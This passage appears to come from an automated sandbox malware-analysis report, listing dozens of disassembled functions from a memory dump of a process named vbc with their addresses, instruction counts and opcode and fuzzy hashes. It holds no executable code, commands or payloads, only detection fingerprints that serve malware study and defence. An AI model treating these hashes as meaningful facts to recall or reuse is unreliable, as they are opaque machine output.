                                                                                                                        • Instruction Fuzzy Hash: 47F05C7E52A6F006CF395B3C749E7E13FA5B742010F5A1449D5A36B202CDF48483C724
                                                                                                                        Function 0536C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dc25f25d57cfa950f08a9fc67d81e74031576d85c9e3e0e91fbdd87ed2b0332e
                                                                                                                        • Instruction ID: 11cf381818239b319864a2f035025682514c4bbfde91f18d69c6004cef6fdb72
                                                                                                                        • Opcode Fuzzy Hash: dc25f25d57cfa950f08a9fc67d81e74031576d85c9e3e0e91fbdd87ed2b0332e
                                                                                                                        • Instruction Fuzzy Hash: D0F0E271515A589FC722D718C548F6177E9FB007A0F0CF42ED4CAC7956C2B4DC80CA98
                                                                                                                        Function 05372619 Relevance: .0, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                        • Instruction ID: 250aa95eee2cf5589939bbc99aea929ce656d3dc5ecddeff68e48e9635ac56ca
                                                                                                                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                        • Instruction Fuzzy Hash: A4E0D8727006002BD7319E598CC4F4777AEEFC2B10F04007AB5045F251CAE6DC0986A4
                                                                                                                        Function 0536CF80 Relevance: .0, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0f2503cf4af7cb7b09027b56ae64a80349c60eadc7eba6a9026732afcc48f9fb
                                                                                                                        • Instruction ID: 37f26d7a3f4d692e22d3eaab74f8647d51e183162a8e1af528b2b07c006132c5
                                                                                                                        • Opcode Fuzzy Hash: 0f2503cf4af7cb7b09027b56ae64a80349c60eadc7eba6a9026732afcc48f9fb
                                                                                                                        • Instruction Fuzzy Hash: 51F0A73230410AEFDB11AB56D844E9EFB6BFF81750F148016F9448B250D771A861C760
                                                                                                                        Function 053C6030 Relevance: .0, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                        • Instruction ID: 431c980e86088eb9752865561ae0ba1e36e0d801bb7ff47877e7c934047ad070
                                                                                                                        • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                        • Instruction Fuzzy Hash: 9BF06572108214DFE3208F49D945F62BBEDFB05364F45C069E609AB560D379EC40CFA4
                                                                                                                        Function 05330710 Relevance: .0, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                        • Instruction ID: 83738e352662db5dc52d040818db4dfcda7e3c3f91e5b95fdcba9a1d056761ab
                                                                                                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                        • Instruction Fuzzy Hash: 31F0ED3A3083449BDB1AEF25C048AA57BE9FB41360B040494E8428B340EB71E982CB80
                                                                                                                        Function 0532EC20 Relevance: .0, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                                                                        • Instruction ID: 2b076058951e0bb7de38f9e37a1937d62a2d10ccc66948257af04598fab7c1ee
                                                                                                                        • Opcode Fuzzy Hash: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                                                                        • Instruction Fuzzy Hash: 49F0E5312046A8EFEF18DB82C84AF35379DFB00324F008419F42C9B092CBB4D984EB44
                                                                                                                        Function 05328E1D Relevance: .0, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c5ac96555e1ec1962fc4665ffe23dc7a07e101a6c105c12571c57001ed977efc
                                                                                                                        • Instruction ID: d1d5f83393648c7f599d51f109879253050affaf7aa113ab6cbc23055929f43e
                                                                                                                        • Opcode Fuzzy Hash: c5ac96555e1ec1962fc4665ffe23dc7a07e101a6c105c12571c57001ed977efc
                                                                                                                        • Instruction Fuzzy Hash: A0F08C30201B60DFDB36AF16CC54B22F6A6FF40720F144A19E0660B8B0CB64AC82CB40
                                                                                                                        Function 053D678E Relevance: .0, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                        • Instruction ID: 20a7e8edba5bf9d19a5a238241c685c2d3a87c4aca399efaccf80f2e4332be38
                                                                                                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                        • Instruction Fuzzy Hash: A9E0DF33B00114FBDB22AB998D06F9ABABCEB80EA0F064054B601E7094D570EE00C6A0
                                                                                                                        Function 05404164 Relevance: .0, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6528f15c02f09cfb3261da86feb4fc91ae8fa7ba3abd387376a5f3e4def07f49
                                                                                                                        • Instruction ID: 5ec8f6acbed84d4a335f2f44fba6e1eb83b730cf8e87fba4eac74af9ea2ade3d
                                                                                                                        • Opcode Fuzzy Hash: 6528f15c02f09cfb3261da86feb4fc91ae8fa7ba3abd387376a5f3e4def07f49
                                                                                                                        • Instruction Fuzzy Hash: D8F0A031925A904FDB61D764D548FA273E1BB00620F2A25B6D4058BA95C334EC80C650
                                                                                                                        Function 053325E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: a244cbdc360fdce3342a16303bc2c7e98fef4b6c6a898ccf4ba7cf4083fef698
                                                                                                                        • Instruction ID: e160fde01f68b9c808c183f0c2ad2e0c6c54d9d491d3d5cf7808919145de5447
                                                                                                                        • Opcode Fuzzy Hash: a244cbdc360fdce3342a16303bc2c7e98fef4b6c6a898ccf4ba7cf4083fef698
                                                                                                                        • Instruction Fuzzy Hash: 7AE092322006549BC721BB29DD0AF8B7B9AEF50360F114525B11557190CB34AC50C784
                                                                                                                        Function 053EA456 Relevance: .0, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                        • Instruction ID: 33c1e761e71b76c50b8f92fb7f8cbd49c131c154cef1317d980a0b98a639f2f3
                                                                                                                        • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                        • Instruction Fuzzy Hash: 96E0E531114A60DBDB366F26D94CB92B6E5FF80711F148C2DA09A125F0C7B5A8D1DE40
                                                                                                                        Function 053B4000 Relevance: .0, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                        • Instruction ID: 3849cfd7ad81bfa28f94fc711b69950f43d1fb373299555b84190e13d4fe2cf8
                                                                                                                        • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                        • Instruction Fuzzy Hash: A6E0C2343043058FEB15CF19C040BA2B7B7BFD5A10F28C068A9498F606EBB2E842CB44
                                                                                                                        Function 0532823B Relevance: .0, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                        • Instruction ID: 21f6ba0cb0b5c115896d20ff8d00a2ce3d322b774353a32fb1d6c0ae550d70b7
                                                                                                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                        • Instruction Fuzzy Hash: F2E08C31600B24EFDB316E11DC04F62B6A6FB44B10F204829F081068A4C7B4AC81DE44
                                                                                                                        Function 05328C8D Relevance: .0, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                                                        • Instruction ID: 714c1488fd65e9b4d6f90f9e56dbae52aa893e9bd6faca888f008e35a9eebdfe
                                                                                                                        • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                                                        • Instruction Fuzzy Hash: E2E0E631541B74DED7317F16DD08F62F6A6FB40711F114829A056168A0C7B4AC85DA55
                                                                                                                        Function 05332050 Relevance: .0, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f6a703c0b9cd2cd385f4cd6092548774d2fadb821792bd9e1755393849c267ae
                                                                                                                        • Instruction ID: 46de3f48fb067825c2f440b3e3ab8b8df09467ed1da9363614be87c591e1219a
                                                                                                                        • Opcode Fuzzy Hash: f6a703c0b9cd2cd385f4cd6092548774d2fadb821792bd9e1755393849c267ae
                                                                                                                        • Instruction Fuzzy Hash: DDE0C2322005606BC721FB5DDD06F8A779EEF94360F114221F15087690CB74BC40C794
                                                                                                                        Function 0536E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                        • Instruction ID: 4aa391d7ad43d2d96ffe98ade9507a1d69bb282a9519e32c3bcf04207aa71641
                                                                                                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                        • Instruction Fuzzy Hash: 65D0A933204620ABD732AA1CFC04FD333E9FB88720F160859B009C7050C3A0AC81CA84
                                                                                                                        Function 0532A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                        • Instruction ID: a9ae671807999c757bc0dd81b4d68dddb23402b43e398b05d069a22d56416157
                                                                                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                        • Instruction Fuzzy Hash: 07D0803331747097CF29A7566D14F677A5AEFC1AA4F1A006D780BD3D00C5559C83D6E0
                                                                                                                        Function 0536CF50 Relevance: .0, Instructions: 14COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 03b6b3cc6991a517c18a1f640942e6589f0251e09e0c61e2150b129301b57449
                                                                                                                        • Instruction ID: 45e476c7a159f1e97071d2ab46e0c2052fc9472b05ecb3aa479cd4852f89246d
                                                                                                                        • Opcode Fuzzy Hash: 03b6b3cc6991a517c18a1f640942e6589f0251e09e0c61e2150b129301b57449
                                                                                                                        • Instruction Fuzzy Hash: 43D0A732110244ABC711FF08CD41F063BAAEB94740F014020B40447621CA31FC60CA48
                                                                                                                        Function 0536CF1F Relevance: .0, Instructions: 13COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0d828487aaf4a7912ca8799bc1a37613e36acec8dab4f4d395fa85cda969ba05
                                                                                                                        • Instruction ID: b6762334870bc36dfaf63bffaa486aaaeab07f07f8c71daeb351ed9a7f0515b6
                                                                                                                        • Opcode Fuzzy Hash: 0d828487aaf4a7912ca8799bc1a37613e36acec8dab4f4d395fa85cda969ba05
                                                                                                                        • Instruction Fuzzy Hash: 62D05E72121440DFD73ADB04C946F6577E4F700704F4580BCA0068B925C728E800DB90
                                                                                                                        Function 0536C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                        • Instruction ID: 8bebe5466451aa01f7d1d6be81af82b1ab2ad86e8bf415b472cb3cdbc4b2b2ba
                                                                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                        • Instruction Fuzzy Hash: 7CC08C33290648AFC712EF98CD01F027BE9EB98B40F100421F3048B670C631FC60EA84
                                                                                                                        Function 05350310 Relevance: .0, Instructions: 11COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                        • Instruction ID: 790b066d1f294868a06b7e9a9e7ccb920ceef9d77f3f62499d2436fdc405920d
                                                                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                        • Instruction Fuzzy Hash: 84D01236200248EFCB05DF91C894D9A772AFBC8710F149019FD19076108A32ED62DA50
                                                                                                                        Function 05330750 Relevance: .0, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                        • Instruction ID: 2843cffc5491fe1173a60f22bc98ed51206429cbd5aa008586a31347a344dbff
                                                                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                        • Instruction Fuzzy Hash: 06C04879B01A418FCF19EB2AD298F6977F8FB44740F150890E805CBB21E664F841DA10
                                                                                                                        Function 053E6F00 Relevance: .0, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                                                        • Instruction ID: 2488dfba1596e2e5f77d53d156ce7cf46e67283a8a81e826620aec835a4217d8
                                                                                                                        • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                                                        • Instruction Fuzzy Hash: A3C02B2F0152C049CD138F3013137E0BFA0D7024C0F0C00C1D0C10F113C0144113C635
                                                                                                                        Function 05404DAD Relevance: .0, Instructions: 6COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                        • Instruction ID: 550388304a3b0213ffccacfa98cbf96d866e58c3fc3be5ea80f7c31a2597abaa
                                                                                                                        • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                        • Instruction Fuzzy Hash: 39B01236312544CFC7026720CB04F1932A9BF017D0F4900F0790089830DA189910E502
                                                                                                                        Function 05374650 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 48cc2492478a8cee1d318bfce9c8ccca4c92c1691e33d8517ed905fe5c251d54
                                                                                                                        • Instruction ID: 43be5e2d6eb1b56fe35178f838917f663785a9533c52821e3357a0cac8b34027
                                                                                                                        • Opcode Fuzzy Hash: 48cc2492478a8cee1d318bfce9c8ccca4c92c1691e33d8517ed905fe5c251d54
                                                                                                                        • Instruction Fuzzy Hash: 33900266601600424144715C4884416A01697E13013D5C555A0594564C861C89559269
                                                                                                                        Function 05374340 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 877907abb38009bae6ebaa9ed77ca808b878d9e6f47d8b560151ae2274a11a47
                                                                                                                        • Instruction ID: e30469ee364adef9018bd86eb7e42b27771e9fab4769b48c4599beed82ff829d
                                                                                                                        • Opcode Fuzzy Hash: 877907abb38009bae6ebaa9ed77ca808b878d9e6f47d8b560151ae2274a11a47
                                                                                                                        • Instruction Fuzzy Hash: 78900236605900129144715C48C4556801697E0301BD5C451E0464558C8A188A565361
                                                                                                                        Function 05372D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 57db0c557729c47b572945f7ce16df4cb29bc616c2cc1c9a94d0455c72505b14
                                                                                                                        • Instruction ID: 255b9ee201a27834944fe6886b35e45450d4ff9b984034856a3e0cd167210795
                                                                                                                        • Opcode Fuzzy Hash: 57db0c557729c47b572945f7ce16df4cb29bc616c2cc1c9a94d0455c72505b14
                                                                                                                        • Instruction Fuzzy Hash: E890022630150003D144715C54986168016D7E1301FD5D451E0454558CD91989565222
                                                                                                                        Function 05372D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 92d1c3b4b2450c78c5109fc8dd9952343f840b4a2d110ea5133148d92cf3226f
                                                                                                                        • Instruction ID: 0590494694e0ffc609b7cd8d5e20503903a6c0ba66ddd36b6d4f5cb552b76c7e
                                                                                                                        • Opcode Fuzzy Hash: 92d1c3b4b2450c78c5109fc8dd9952343f840b4a2d110ea5133148d92cf3226f
                                                                                                                        • Instruction Fuzzy Hash: CD90022E21350002D184715C548861A401687D1302FD5D855A005555CCC91989695321
                                                                                                                        Function 05372D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ac3def52f060596552ead670c8041fdc783c14ffa1daedc3c10633d8559fb608
                                                                                                                        • Instruction ID: 678f529972ae17aa35ea5be757336674cef690f8abe3221bb7456b401d732f77
                                                                                                                        • Opcode Fuzzy Hash: ac3def52f060596552ead670c8041fdc783c14ffa1daedc3c10633d8559fb608
